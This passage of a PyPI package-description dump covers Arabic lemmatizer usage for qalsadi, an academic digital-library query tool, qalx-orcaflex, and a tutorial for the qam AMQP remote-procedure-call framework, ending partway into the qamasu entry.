\u0627\u0644\u0641\u0631\u0646\u0633\u064a\u0629 \u0627\u0644\u062a\u064a \u0646\u062f\u0631\u0633 \u0641\u064a \u0627\u0644\u0645\u062f\u0631\u0633\u0629 \u0644\u064a\u0633\u062a \u0627\u0644\u0641\u0631\u0646\u0633\u064a\u0629 \u0627\u0644\u062a\u064a \u064a\u0633\u062a\u062e\u062f\u0645\u0647\u0627 \u0627\u0644\u0646\u0627\u0633 \u0641\u064a \u0634\u0648\u0627\u0631\u0639 \u0628\u0627\u0631\u064a\u0633 .. \u0648\u0645\u0644\u0643\u0629 \u0628\u0631\u064a\u0637\u0627\u0646\u064a\u0627 \u0644\u0627 \u062a\u062e\u0637\u0628 \u0628\u0644\u063a\u0629 \u0634\u0648\u0627\u0631\u0639 \u0644\u0646\u062f\u0646 .. \u0644\u0643\u0644 \u0645\u0642\u0627\u0645 \u0645\u0642\u0627\u0644\"\"\">>>lemmer=qalsadi.lemmatizer.Lemmatizer()>>># lemmatize a word...lemmer.lemmatize(\"\u064a\u062d\u062a\u0627\u062c\")'\u0627\u062d\u062a\u0627\u062c'>>># lemmatize a word with a specific pos>>>lemmer.lemmatize(\"\u0648\u0641\u064a\")'\u0641\u064a'>>>lemmer.lemmatize(\"\u0648\u0641\u064a\",pos=\"v\")'\u0648\u0641\u0649'>>>lemmas=lemmer.lemmatize_text(text)>>>print(lemmas)['\u0647\u0644','\u0627\u062d\u062a\u0627\u062c','\u0625\u0644\u0649','\u062a\u0631\u062c\u0645\u0629','\u0643\u064a','\u062a\u0641\u0647\u0645','\u062e\u0637\u0627\u0628','\u0645\u0644\u0643','\u061f','\u0644\u063a\u0629','\"','\u0643\u0644\u0627\u0633\u064a\u0643\u064a','\"(','\u0641\u0635\u062d\u0649',')','\u0645\u0648\u062c\u0648\u062f','\u0641\u064a','\u0643\u0644','\u0644\u063a\u0629','\u0630\u0644\u0643','\u0644\u063a\u0629','\"','\u062f\u0627\u0631\u062c','\"..','\u0641\u0631\u0646\u0633\u064a','\u0627\u0644\u062a\u064a','\u062f\u0631\u0633','\u0641\u064a','\u0645\u062f\u0631\u0633\u0629','\u0644\u064a\u0633\u062a','\u0641\u0631\u0646\u0633\u064a','\u0627\u0644\u062a\u064a','\u0627\u0633\u062a\u062e\u062f\u0645','\u0646\u0627\u0633','\u0641\u064a','\u0634\u0648\u0627\u0631\u0639','\u0628\u0627\u0631\u064a\u0633','..','\u0645\u0644\u0643','\u0628\u0631\u064a\u0637\u0627\u0646\u064a\u0627','\u0644\u0627','\u062e\u0637\u0628','\u0628\u0644\u063a\u0629','\u0634\u0648\u0627\u0631\u0639','\u062f\u0646\u0648','..','\u0643\u0644','\u0645\u0642\u0627\u0645','\u0645\u0642\u0627\u0644\u064a']>>># lemmatize a text and return lemma 
pos...lemmas=lemmer.lemmatize_text(text,return_pos=True)>>>print(lemmas)[('\u0647\u0644','stopword'),('\u0627\u062d\u062a\u0627\u062c','verb'),('\u0625\u0644\u0649','stopword'),('\u062a\u0631\u062c\u0645\u0629','noun'),('\u0643\u064a','stopword'),('\u062a\u0641\u0647\u0645','noun'),('\u062e\u0637\u0627\u0628','noun'),('\u0645\u0644\u0643','noun'),'\u061f',('\u0644\u063a\u0629','noun'),'\"',('\u0643\u0644\u0627\u0633\u064a\u0643\u064a','noun'),'\"(',('\u0641\u0635\u062d\u0649','noun'),')',('\u0645\u0648\u062c\u0648\u062f','noun'),('\u0641\u064a','stopword'),('\u0643\u0644','stopword'),('\u0644\u063a\u0629','noun'),('\u0630\u0644\u0643','stopword'),('\u0644\u063a\u0629','noun'),'\"',('\u062f\u0627\u0631\u062c','noun'),'\"..',('\u0641\u0631\u0646\u0633\u064a','noun'),('\u0627\u0644\u062a\u064a','stopword'),('\u062f\u0631\u0633','verb'),('\u0641\u064a','stopword'),('\u0645\u062f\u0631\u0633\u0629','noun'),('\u0644\u064a\u0633\u062a','stopword'),('\u0641\u0631\u0646\u0633\u064a','noun'),('\u0627\u0644\u062a\u064a','stopword'),('\u0627\u0633\u062a\u062e\u062f\u0645','verb'),('\u0646\u0627\u0633','noun'),('\u0641\u064a','stopword'),('\u0634\u0648\u0627\u0631\u0639','noun'),('\u0628\u0627\u0631\u064a\u0633','all'),'..',('\u0645\u0644\u0643','noun'),('\u0628\u0631\u064a\u0637\u0627\u0646\u064a\u0627','noun'),('\u0644\u0627','stopword'),('\u062e\u0637\u0628','verb'),('\u0628\u0644\u063a\u0629','noun'),('\u0634\u0648\u0627\u0631\u0639','noun'),('\u062f\u0646\u0648','verb'),'..',('\u0643\u0644','stopword'),('\u0645\u0642\u0627\u0645','noun'),('\u0645\u0642\u0627\u0644\u064a','noun')]>>># Get vocalized output lemmas>>>lemmer.set_vocalized_lemma()>>>lemmas=lemmer.lemmatize_text(text)>>>print(lemmas)['\u0647\u064e\u0644\u0652','\u0627\u0650\u062d\u0652\u062a\u064e\u0627\u062c\u064e','\u0625\u0650\u0644\u064e\u0649','\u062a\u064e\u0631\u0652\u062c\u064e\u0645\u064e\u0629\u064c','\u0643\u064e\u064a\u0652','\u062a\u064e\u0641\u064e\u0647\u0651\u064f\u0645\u064c','\u062e\u064e\u0637\u0651\u064e\u0627\u0628\u064c','\u0645\u064e\u0644\u064e\u0643\u064c','\u061f','\u0644\u064f\u063a\u064e\u0629\u064c','\"','\u0643\u0650\u0644\u0627\u064e\u0633\u0650\u064a\u0643\u0650\u064a\u0651\u064c','\"(','\u0641\u064f\u0635\u0652\u062d\u064e\u0649',')','\u0645\u064e\u0648\u0652\u062c\u064f\u0648\u062f\u064c','\u0641\u0650\u064a','\u0643\u064f\u0644\u0651\u064e','\u0644\u064f\u063a\u064e\u0629\u064c','\u0630\u064e\u0644\u0650\u0643\u064e','\u0644\u064f\u063a\u064e\u0629\u064c','\"','\u062f\u064e\u0627\u0631\u0650\u062c\u064c','\"..','\u0641\u064e\u0631\u064e\u0646\u0652\u0633\u0650\u064a\u0651','\u0627\u0644\u0651\u064e\u062a\u0650\u064a','\u062f\u064e\u0631\u064e\u0633\u064e','\u0641\u0650\u064a','\u0645\u064e\u062f\u0652\u0631\u064e\u0633\u064e\u0629\u064c','\u0644\u064e\u064a\u0652\u0633\u064e\u062a\u0652','\u0641\u064e\u0631\u064e\u0646\u0652\u0633\u0650\u064a\u0651','\u0627\u0644\u0651\u064e\u062a\u0650\u064a','\u0627\u0650\u0633\u0652\u062a\u064e\u062e\u0652\u062f\u064e\u0645\u064e','\u0646\u064e\u0627\u0633\u064c','\u0641\u0650\u064a','\u0634\u064e\u0648\u064e\u0627\u0631\u0650\u0639\u064c','\u0628\u0627\u0631\u064a\u0633','..','\u0645\u064e\u0644\u064e\u0643\u064c','\u0628\u0631\u0650\u064a\u0637\u0627\u0646\u0650\u064a\u0627','\u0644\u064e\u0627','\u062e\u064e\u0637\u064e\u0628\u064e','\u0628\u064e\u0644\u064e\u063a\u064e\u0629\u064c','\u0634\u064e\u0648\u064e\u0627\u0631\u0650\u0639\u064c','\u0623\u064e\u062f\u064e\u0627\u0646\u064e','..','\u0643\u064f\u0644\u0651\u064e','\u0645\u064e\u0642\u064e\u0627\u0645\u064c',
'\u0645\u064e\u0642\u064e\u0627\u0644\u064c']>>>Morphology analysisfilename=\"samples/text.txt\"importqalsadi.analexasqatry:myfile=open(filename)text=(myfile.read()).decode('utf8');iftext==None:text=u\"\u0627\u0644\u0633\u0644\u0627\u0645 \u0639\u0644\u064a\u0643\u0645\"except:text=u\"\u0623\u0633\u0644\u0645\"print\" given text\"debug=False;limit=500analyzer=qa.Analex()analyzer.set_debug(debug);result=analyzer.check_text(text);print'----------------python format result-------'printresultforiinrange(len(result)):# print \"--------\u062a\u062d\u0644\u064a\u0644 \u0643\u0644\u0645\u0629 ------------\", word.encode('utf8');print\"-------------One word detailed case------\";foranalyzedinresult[i]:print\"-------------one case for word------\";printrepr(analyzed);Output descriptionCategoryApplied onfeatureexample a\u0634\u0631\u062daffixallaffix_key\u0627\u0644--\u064e\u0627\u062a\u064f- a\u0645\u0641\u062a\u0627\u062d \u0627\u0644\u0632\u0648\u0627\u0626\u062faffixallaffixa\u0627\u0644\u0632\u0648\u0627\u0626\u062finputallword\u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a a\u0627\u0644\u0643\u0644\u0645\u0629 \u0627\u0644\u0645\u062f\u062e\u0644\u0629inputallunvocalizeda\u063a\u064a\u0631 \u0645\u0634\u0643\u0648\u0644morphologynountag_mamnou30 a\u0645\u0645\u0646\u0648\u0639 \u0645\u0646 \u0627\u0644\u0635\u0631\u0641morphologyverbtag_confirmed0 a\u062e\u0627\u0635\u064a\u0629 \u0627\u0644\u0641\u0639\u0644 \u0627\u0644\u0645\u0624\u0643\u062fmorphologyverbtag_mood0 a\u062d\u0627\u0644\u0629 \u0627\u0644\u0641\u0639\u0644 \u0627\u0644\u0645\u0636\u0627\u0631\u0639 (\u0645\u0646\u0635\u0648\u0628\u060c \u0645\u062c\u0632\u0648\u0645\u060c \u0645\u0631\u0641\u0648\u0639)morphologyverbtag_pronoun0 a\u0627\u0644\u0636\u0645\u064a\u0631morphologyverbtag_transitive0 a\u0627\u0644\u062a\u0639\u062f\u064a \u0627\u0644\u0644\u0632\u0648\u0645morphologyverbtag_voice0 a\u0627\u0644\u0628\u0646\u0627\u0621 \u0644\u0644\u0645\u0639\u0644\u0648\u0645/ \u0627\u0644\u0628\u0646\u0627\u0621 \u0644\u0644\u0645\u062c\u0647\u0648\u0644morphologynountag_regular1 a\u0642\u064a\u0627\u0633\u064a/ \u0633\u0645\u0627\u0639\u064amorphologynoun/verbtag_gender3 a\u0627\u0644\u0646\u0648\u0639 ( \u0645\u0624\u0646\u062b \u0645\u0630\u0643\u0631)morphologyverbtag_person4 a\u0627\u0644\u0634\u062e\u0635 (\u0627\u0644\u0645\u062a\u0643\u0644\u0645 \u0627\u0644\u063a\u0627\u0626\u0628 \u0627\u0644\u0645\u062e\u0627\u0637\u0628)morphologynountag_number21 a\u0627\u0644\u0639\u062f\u062f(\u0641\u0631\u062f/\u0645\u062b\u0646\u0649/\u062c\u0645\u0639)originalnoun/verbfreq694644 a\u062f\u0631\u062c\u0629 \u0634\u064a\u0648\u0639 \u0627\u0644\u0643\u0644\u0645\u0629originalalloriginal_tags(u a\u062e\u0635\u0627\u0626\u0635 \u0627\u0644\u0643\u0644\u0645\u0629 \u0627\u0644\u0623\u0635\u0644\u064a\u0629originalalloriginal\u0628\u064e\u064a\u064e\u0627\u0646\u064c a\u0627\u0644\u0643\u0644\u0645\u0629 \u0627\u0644\u0623\u0635\u0644\u064a\u0629originalallroot\u0628\u064a\u0646 a\u0627\u0644\u062c\u0630\u0631originalalltag_original_gender\u0645\u0630\u0643\u0631 a\u062c\u0646\u0633 \u0627\u0644\u0643\u0644\u0645\u0629 \u0627\u0644\u0623\u0635\u0644\u064a\u0629originalnountag_original_number\u0645\u0641\u0631\u062f a\u0639\u062f\u062f \u0627\u0644\u0643\u0644\u0645\u0629 \u0627\u0644\u0623\u0635\u0644\u064a\u0629outputalltypeNoun:\u0645\u0635\u062f\u0631 a\u0646\u0648\u0639 \u0627\u0644\u0643\u0644\u0645\u0629outputallsemivocalized\u0627\u0644\u0652\u0628\u064e\u064a\u064e\u0627\u0646\u064e\u0627\u062a 
a\u0627\u0644\u0643\u0644\u0645\u0629 \u0645\u0634\u0643\u0648\u0644\u0629 \u0628\u062f\u0648\u0646 \u0639\u0644\u0627\u0645\u0629 \u0627\u0644\u0625\u0639\u0631\u0627\u0628outputallvocalized\u0627\u0644\u0652\u0628\u064e\u064a\u064e\u0627\u0646\u064e\u0627\u062a\u064f a\u0627\u0644\u0643\u0644\u0645\u0629\u0645\u0634\u0643\u0648\u0644\u0629outputallstem\u0628\u064a\u0627\u0646 a\u0627\u0644\u062c\u0630\u0639syntaxalltag_break0 a\u0627\u0644\u0643\u0644\u0645\u0629 \u0645\u0646\u0641\u0635\u0644\u0629 \u0639\u0645\u0651\u0627 \u0642\u0628\u0644\u0647\u0627syntaxalltag_initial0 a\u062e\u0627\u0635\u064a\u0629 \u0646\u062d\u0648\u064a\u0629\u060c \u0627\u0644\u0643\u0644\u0645\u0629 \u0641\u064a \u0628\u062f\u0627\u064a\u0629 \u0627\u0644\u062c\u0645\u0644\u0629syntaxalltag_transparent0 a\u0627\u0644\u0628\u062f\u0644syntaxnountag_added0 a\u062e\u0627\u0635\u064a\u0629 \u0646\u062d\u0648\u064a\u0629\u060c \u0627\u0644\u0643\u0644\u0645\u0629 \u0645\u0636\u0627\u0641syntaxallneeda\u0627\u0644\u0643\u0644\u0645\u0629 \u062a\u062d\u062a\u0627\u062c \u0625\u0644\u0649 \u0643\u0644\u0645\u0629 \u0623\u062e\u0631\u0649 (\u0627\u0644\u0645\u062a\u0639\u062f\u064a\u060c \u0627\u0644\u0639\u0648\u0627\u0645\u0644) \u063a\u064a\u0631 \u0645\u0646\u062c\u0632\u0629syntaxtoolactiona\u0627\u0644\u0639\u0645\u0644syntaxtoolobject_typea\u0646\u0648\u0639 \u0627\u0644\u0645\u0639\u0645\u0648\u0644\u060c \u0628\u0627\u0644\u0646\u0633\u0628\u0629 \u0644\u0644\u0639\u0627\u0645\u0644\u060c \u0645\u062b\u0644\u0627 \u0627\u0633\u0645 \u0644\u062d\u0631\u0641 \u0627\u0644\u062c\u0631Unsing CacheQalsadi can use Cache to speed up the process, there are 4 kinds of cache,Memory cachePickle cachePickledb cacheCodernityDB cache.To use one of it, you can see the followng examples:Using a factory method>>>importqalsadi.analex>>>fromqalsadi.cache_factoryimportCache_Factory>>>analyzer=qalsadi.analex.Analex()>>># list available cache names>>>Cache_Factory.list()['','memory','pickle','pickledb','codernity']>>># configure cacher>>># configure path used to store the cache>>>path='cache/qalsasicache.pickledb'>>>cacher=Cache_Factory.factory(\"pickledb\",path)>>>analyzer.set_cacher(cacher)>>># to enable the use of cacher>>>analyzer.enable_allow_cache_use()Memory cache>>>importqalsadi.analex>>>analyzer=qalsadi.analex.Analex()>>># configure cacher>>>importqalsadi.cache>>>cacher=qalsadi.cache.Cache()>>>analyzer.set_cacher(cacher)>>># to enable the use of cacher>>>analyzer.enable_allow_cache_use()>>># to disable the use of cacher>>>analyzer.disable_allow_cache_use()Pickle cache>>>importqalsadi.analex>>>fromqalsadi.cache_pickleimportCache>>>analyzer=qalsadi.analex.Analex()>>># configure cacher>>># configure path used to store the cache>>>path='cache/qalsadiCache.pickle'>>>cacher=Cache(path)>>>analyzer.set_cacher(cacher)>>># to enable the use of cacher>>>analyzer.enable_allow_cache_use()Pickledb cache>>>importqalsadi.analex>>>fromqalsadi.cache_pickledbimportCache>>>analyzer=qalsadi.analex.Analex()>>># configure cacher>>># configure path used to store the cache>>>path='cache/qalsadiCache.pickledb'>>>cacher=Cache(path)>>>analyzer.set_cacher(cacher)>>># to enable the use of cacher>>>analyzer.enable_allow_cache_use()CodernityDB cache>>>importqalsadi.analex>>>fromqalsadi.cache_codernityimportCache>>>analyzer=qalsadi.analex.Analex()>>># configure cacher>>># configure path used to store the cache>>>path='cache'>>>cacher=Cache(path)>>>analyzer.set_cacher(cacher)>>># to enable the use of cacher>>>analyzer.enable_allow_cache_use()"} 
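A minimal usage sketch for the qalsadi entry above, assuming only the calls that entry already demonstrates (Analex, the in-memory Cache, set_cacher, enable_allow_cache_use and check_text) and reusing the sample sentence from its morphology example; it is a hedged illustration of how the cache section composes with check_text, not additional official qalsadi documentation.
>>> import qalsadi.analex
>>> import qalsadi.cache
>>> # build the analyzer and attach the in-memory cache shown in the entry above
>>> analyzer = qalsadi.analex.Analex()
>>> analyzer.set_cacher(qalsadi.cache.Cache())
>>> analyzer.enable_allow_cache_use()
>>> # analyse the same sample sentence twice; the second pass can reuse cached word analyses
>>> text = u"\u0627\u0644\u0633\u0644\u0627\u0645 \u0639\u0644\u064a\u0643\u0645"
>>> first_pass = analyzer.check_text(text)
>>> second_pass = analyzer.check_text(text)
>>> # check_text returns one list of candidate analyses per word in the input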
+{"package": "qal-swflint", "pacakge-description": "Query Academic LibraryThis application is built to support automatically searching a number of academic digital libraries. In particular, it currently supports the following:IEEE XploreSpringerLinkScienceDirectToolsqal-queryThis tool can be used to try queries out on different digital libraries, as well as discover information about the capabilities and query options of each individual library. Options of note include:-Lor--list-libraries: This option will list all libraries known to the system and their abbreviations.-dor--describe: When coupled with-l, describe a library, showing the query option names available and their descriptions.-lor--library: Select a library to query or describe.-ror--results: Select where to store results.-qor--query: Multiple allowed, should be of the formquery-option-name=value.qal-autoThis tool is used to automatically run several queries against supported digital libraries. There are several options, including:-por--plan-file: The location of the plan file. Format described below.-sor--status-file: Where to store query status (allows for picking back up if interrupted).-oor--output-file: Where to store the results data.-bor--number-batches: How many batches to run (how many times through one page of each query/provider pair).-vor--verbose: Can show multiple times, more times is more verbose.Plan FilesThe plan file is a JSON-formatted dictionary, with at least the two following keys.sites: an array of dictionaries. Each dictionary contains minimum aname, and should contain akey, and can also containstartandpage_sizekeys (integer values), and an optionaloptionskey with a dictionary of options. See documentation for particular APIs.queries: an array of dictionaries. These dictionaries map query options (symbolic names, seeqal-query --describe -l libraryfor options) to string values.Obtaining API KeysConfer with your institution & institutional library before doing so, however, it's fairly easy to obtain keys.For IEEE Xplore:register here. Place the API Key inIEEE_XPLORE_API_KEY.For SpringerLink:register here. Place the API Key inSPRINGER_LINK_API_KEY.For ScienceDirect:register here. Place the API Key inSCIENCE_DIRECT_API_KEY.Notes on Particular BackendsSpringerLinkThis must be accessed from your institutional IP address allocations. Springer uses the requester IP as part of the authentication process. Currently, their API does not give JSON-formatted responses on error: in this case, execution is stopped.ScienceDirectThis must also be accessed from your institutional IP address allocations. Elsevier will limit results based on your institutions subscriptions (as far as I can tell, at least). They handle quite well reporting of errors. If you ever get an error message that is not handled, please make an issue."} +{"package": "qalx-orcaflex", "pacakge-description": "qalx-orcaflexTools to help you run OrcaFlex onqalx.To use this package you'll need aqalxAPI key.\nThis can be obtained by registering atqalx.net.FeaturesThe current features are:Batches: build batches of OrcaFlex data files from various sourcesResults: attach some required results which will be extracted automatically when the simulation is complete. 
The results will also be summarised for each batch. Load case information: results in a batch can be linked to information about the load case. Model views: define a set of model views that will be automatically captured at the end of the simulation. Smart statics: allows you to add object tags that will be used to iteratively find a model that solves in statics. Some planned features: custom results specification; linked statistics and extreme statistics; model views at key result points (e.g. max of a time history); model video extraction; optional progress screenshots; automatic batch cancellation on result breach; the option to define \u201cModel deltas\u201d from a base model; the option to extract all model data into qalx (useful if you want to do analytics/ML on model/sim data over time). Installation: pip install qalx-orcaflex. Documentation: This can be found here. Questions? Please send us an email (info@qalx.net)!"} +{"package": "qam", "pacakge-description": "Introduction: qam is a framework for remote-procedure-calls. It uses the carrot messaging framework. The RPC-specific code is based on Python XML-RPC. Note: qam is not actively maintained anymore by the qam team. The successor of qam is callme. callme internally uses a simpler approach than qam, due to the improvements the AMQP standard has made since QAM was released. Therefore we made a complete re-design and wrote callme, which has less overhead and is much faster than qam. Key Features: uses AMQP as transport protocol; supports synchronous and asynchronous remote method calls; supports timeouts in synchronous and asynchronous mode; JSON marshaling for high interoperability (see Serialization: JSON vs. Pickle for details); Pickle marshaling for object transport support; supports remote exception transfer in JSON/Pickle and synchronous/asynchronous mode; fully threaded; easy to use; open-source, BSD-licensed. The AMQP messaging system manages the remote-procedure-calls for a client and a server. The client sends an AMQP message to the server, specifying the method that should be called on the server.\nAfter executing the function, the result is packed into an AMQP message and sent back to the client. The aim of qam is to offer a simple RPC framework which is reliable and secure. You have to install an AMQP message broker. The most popular are RabbitMQ, ZeroMQ and Apache ActiveMQ. Personally we have used RabbitMQ; it is easy to install and to configure. Before you start using the qam framework you should know a little bit about AMQP.\nTherefore we advise you to read Rabbits and warrens, a very good article which introduces the basic ideas of AMQP.\nFurther, you can look at the carrot documentation. There you can also get a good overview of AMQP. Documentation: The full documentation, including the reference, can be found at pypi documentation. Mailing list: Join the QAM Users mailing list: QAM-Users. If you are developing inside QAM, join: QAM-Developers. Bug Tracker: If you find any issues please report them on http://bitbucket.org/qamteam/qam/issues/ Getting QAM: You can get the python package on the Python Package Index. The Mercurial repository is available at bitbucket.org qam. Installation: qam can be installed via the Python Package Index or from source. Using easy_install to install qam: $ easy_install qam If you have downloaded a source tarball you can install it\nby doing the following: $ python setup.py build\n# python setup.py install # as root Tutorial: Starting the QAMServer. First it is necessary to tell the QAMServer which functions are available.
Therefore you have to register the functions on the QAMServer.\nAfter registering the functions, the QAMServer waits for method-calls from the QAMProxy.Here is how you register a function on QAMServer and switch into the serving mode:>>> from qam.qam_server import QAMServer\n>>> qam_server = QAMServer(hostname=\"localhost\",\n... port=5672,\n... username='guest',\n... password='guest',\n... vhost='/',\n... server_id='qamserver')\n...\n>>> def adder_function(x, y):\n... return x + y\n...\n>>> qam_server.register_function(adder_function, 'add')\n...\n... # it is also possible to register the adder_function as follows:\n... # qam_server.register_function(adder_function)\n... # the method-name for registering in this case is adder_function.__name__\n...\n>>> qam_server.serve()It is also possible to register whole classes on QAMServer. Therefore you only have to register the class instance on the QAMServer.\nIt\u2019s not necessary to register all functions of the class, it\u2019s enough when you register the class instance.IMPORTANT:When you register an instance you must specify a name as second argument in theregister_class()method which selects the instance when calling it.\nIn the example below you would call the remote methodproxy.my_instance.adder_function(1,2)Here is how you register a class instance on QAMServer and switch into the serving mode:>>> from qam.qam_server import QAMServer\n>>> qam_server = QAMServer(hostname=\"localhost\",\n... port=5672,\n... username='guest',\n... password='guest',\n... vhost='/',\n... server_id='qamserver')\n...\n>>> class TestClass():\n... def __init__(self):\n... pass\n... def adder_function(self,a,b):\n... return a+b\n...\n>>> instance = TestClass()\n>>> qam_server.register_class(instance,'my_instance')\n>>> qam_server.serve()Managing RPC with QAMProxyThe QAMProxy sends the RPC-requests to the QAMServer and receives the result. It acts like a client which can call Server Methods and receive their\nresults.There are two different ways to receive the result:synchronous call: the QAMProxy blocks until a result arrivesasynchronous call: it is possible to register a callback-function which will be called when the result arrives.\nIn the meantime the QAMProxy can execute other functions or you can go in with your programm to execute.Synchronous RPCThis example shows you how to call a simple method registered on the QAMServer. You have to wait for the result, because no callback-function is registered. So it is a synchronous RPC.>>> from qam.qam_proxy import QAMProxy, QAMMethodNotFoundException, QAMException\n... # create a new QAMProxy-instance\n>>> qam_proxy = QAMProxy(hostname=\"localhost\",\n... port=5672,\n... username='guest',\n... password='guest',\n... vhost='/',\n... server_id='qamserver',\n... client_id='qamproxy')\n...\n>>> result = qam_proxy.add(2,3) # call method on QAMServer and wait for a result\n... # close all open AMQP connections and cleanup\n>>> qam_proxy.close()In case you have registered a class instance on the QAMServer and you want to call a method from this instance you can simple call this instance on QAMProxy.\nYou can call the instance with the name you specified withqam.qam_server.QAMServer.register_class(instance,name).\nIn this example it is a synchronous RPC again. You have to wait for the result.>>> from qam.qam_proxy import QAMProxy, QAMMethodNotFoundException, QAMException\n>>> qam_proxy = QAMProxy(hostname=\"localhost\",\n... port=5672,\n... username='guest',\n... password='guest',\n... vhost='/',\n... 
server_id='qamserver',\n... client_id='qamproxy')\n...\n>>> result = qam_proxy.my_instance.adder_function(2,4)\n>>> qam_proxy.close()Asynchronous RPCIf you don\u2019t want to wait for the result it is possible to register a callback-function.\nYou can do this by callingQAMProxy.callback(callback_function,error_function).method_to_call_on_server(params).\nThe callback-function takes two parameters as arguments. The first is the callback-function.\nThe second is optional and is only called if an error occourd on QAMServer.SIDENOTE:It is highly recomended that you alway set a error_function as well, as\nyou can never know if the remote method will succeed or will throw an exception or if an internal exception will happen. Especially in asynchronous\ncalls the only way you will be notified in case of an error WITHOUT an error_function is the qam logging.After receiving the result from QAMServer the callback-function or the error-function is executed, with the result as parameter.\nYou can monitor the state of the callback withqam.qam_proxy.get_callback_state(uid). Possible States are:0: waiting on result1: processing (result arrived and callback/error function is currently executing)2: callback finished (callback/error function have finished executing)In the following example you can see how to use callback-functions. In this example a simple method-call on the Server should be executed.\nNo class instance is registered on the QAMServer, only the adder_function is registered.>>> from qam.qam_proxy import QAMProxy, QAMMethodNotFoundException, QAMException\n>>> qam_proxy = QAMProxy(hostname=\"localhost\",\n... port=5672,\n... username='guest',\n... password='guest',\n... vhost='/',\n... server_id='qamserver',\n... client_id='qamproxy')\n...\n... # defining functions for callback\n>>> def success(arg):\n... print arg\n>>> def error(arg):\n... # if an error occours on QAMServer\n... print arg\n>>> uid = qam_proxy.callback(success, error).add(2,4)\n>>> while True:\n... state = qam_proxy.get_callback_state(uid)\n... if state == 2 :\n... # execution of callback finished\n... break\n...\n>>> qam_proxy.close()The function success and error are registered as callback and error function. If everything succeeds the success-function will be called.\nIf an error occoured on the QAMServer the error-function will be called.\nIf no error-function is defined and an error occourd a log-message is written into the logging system.It is also possible to execute asynchronous class-instance-method calls on the QAMServer. In the following example you can see how you can manage that.\nYou can call the instance with the name you specified withqam.qam_server.QAMServer.register_class(instance,name).>>> from qam.qam_proxy import QAMProxy, QAMMethodNotFoundException, QAMException\n>>> qam_proxy = QAMProxy(hostname=\"localhost\",\n... port=5672,\n... username='guest',\n... password='guest',\n... vhost='/',\n... server_id='qamserver',\n... client_id='qamproxy')\n...\n... # defining functions for callback\n>>> def success(arg):\n... print arg\n>>> def error(arg):\n... # if an error occours on QAMServer\n... print arg\n>>> uid = qam_proxy.callback(success, error).my_instance.adder_function(2,4)\n>>> while True:\n... state = qam_proxy.get_callback_state(uid)\n... if state == 2 :\n... # execution of callback finished\n... break\n...\n>>> qam_proxy.close()TimeoutsIt is also possible to set timeouts for remote functions. E.g. 
you might use timeouts if you don\u2019t want to wait longer than for example 10 seconds\nfor a function to return because after 10 seconds the result isn\u2019t important for you anymore.A simple client side synchronous code would look like this:>>> from qam.qam_proxy import QAMProxy, QAMMethodNotFoundException, QAMException, QAMTimeoutException\n... # create a new QAMProxy-instance\n>>> qam_proxy = QAMProxy(hostname=\"localhost\",\n... port=5672,\n... username='guest',\n... password='guest',\n... vhost='/',\n... server_id='qamserver',\n... client_id='qamproxy')\n...\n>>> try:\n>>> result = qam_proxy.set_timeout(10).add(2,3) # call method on QAMServer and wait for a result\n>>> except QAMTimeoutException:\n>>> print 'Remote function is too slow, timeout occoured.'\n...# close all open AMQP connections and cleanup\n>>> qam_proxy.close()But we also can set timeouts in asynchronous mode. The Callback/Error function will then only get called if it gets executed before the\ntimeout occours. If the timeout occours before the callback/error function gets executed, the error function gets called with aqam.qam_proxy.QAMTimeoutExceptionas argument. Let\u2019s have a look at some sample code, again we assume that after 10 seconds result is\nnot anymore important to us.A simple client side asynchronous code would look like this:>>> from qam.qam_proxy import QAMProxy, QAMMethodNotFoundException, QAMException, QAMTimeoutException\n>>> qam_proxy = QAMProxy(hostname=\"localhost\",\n... port=5672,\n... username='guest',\n... password='guest',\n... vhost='/',\n... server_id='qamserver',\n... client_id='qamproxy')\n...\n... # defining functions for callback\n>>> def success(arg):\n... print arg\n>>> def error(arg):\n... if isinstance(arg, QAMTimeoutException):\n... #timeout occoured\n... print 'Timeout occoured'\n... else:\n... print 'Other error happened'\n>>> uid = qam_proxy.callback(success, error).set_timeout(10).add(2,4)\n>>> while True:\n... state = qam_proxy.get_callback_state(uid)\n... if state == 2 :\n... # execution of callback finished\n... break\n...\n>>> qam_proxy.close()Internally, if an timeout occours it doesn\u2019t matter if the actual function will return some day or if it will never return.\nIn case the remote function returns after the timeout exception has occoured the message will be correctly processed (so that everything stays\nclean in the AMQP Subsystem) but the result will be thrown away.Serialization: JSON vs. PickleWhen working with QAM all the remote methods and results will get serialized in the background for you that you don\u2019t have to bother about that.\nBut for flexibility you can choose between two serializer: JSON and Pickle. Both have their benefits and drawbacks. In most cases you will do fine\nwith the default Pickle serializer. But if you have special requirements you might choose the JSON serializer.IMPORTANT: Anyway which serializer you choose, you must specify the same serializer on the QAMServer and on the QAMProxy, otherwise\nthey can\u2019t communicate correctly.SIDENOTE:The default serializer isPickle.To set the serializer on the proxy, here e.g. json:>>> from qam.qam_proxy import QAMProxy\n... # create a new QAMProxy-instance\n>>> qam_proxy = QAMProxy(hostname=\"localhost\",\n... port=5672,\n... username='guest',\n... password='guest',\n... vhost='/',\n... server_id='qamserver',\n... serializer='json')To set the serializer on the server, again json:>>> from qam.qam_server import QAMServer\n>>> qam_server = QAMServer(hostname=\"localhost\",\n... 
port=5672,\n... username='guest',\n... password='guest',\n... vhost='/',\n... server_id='qamserver',\n... serializer='json')To get an slight overview which serializer fits your need best here is a small comparison.\nThis comparision is specially trimmed for the use in QAM. In other environments there might be other things to be aware of.PropertyPickleJSONCompressiongoodno compressionComplex Object Transportyesonly json encodable\nobjects are supported\n(dict, list, scalar)Support for Custom Exception Inheritanceyesno, but you can use\nExceptions as well. The\nonly drawback is that you\ncannot create custom Exceptions\nwith inheritanceInteroperability with other languagesworsegood, as our transport format\nis quite easy to implement in\nother languages with json supportNeeds Complex Type Definitions on\nboth sides (Proxy and Server)yes, because proxy and\nthe server need to know\nwhich type they will get.\nYou have to import your\ncustom Argument Classes or\ncustom Exceptions you want\nto raise on both proxy side\nand server side.no, because we can only transfer dict\nlist, and scalars we don\u2019t need to\ndefine them seperately.ArchitectureSupported byWingware - The Python IDE (http://wingware.com)ContributingWe are welcome everyone who wants to contribute to QAM. Development of QAM happens athttp://bitbucket.org/qamteam/qam/LicenseQAM is released under the BSD License. The full license text is in the root folder of the QAM Package."} +{"package": "qama-distr", "pacakge-description": "No description available on PyPI."} +{"package": "qamanage", "pacakge-description": "Public Script Library of quality management department"} +{"package": "qamasu", "pacakge-description": "Qamasu is JobQueue system that respects TheSchwartz.Suited to load leveling.Implemented using optimistic lock.RequirementsPython>=2.6Django>=1.0Python3 needs Django1.5UsageSet Qamasu up!Qamasu is a 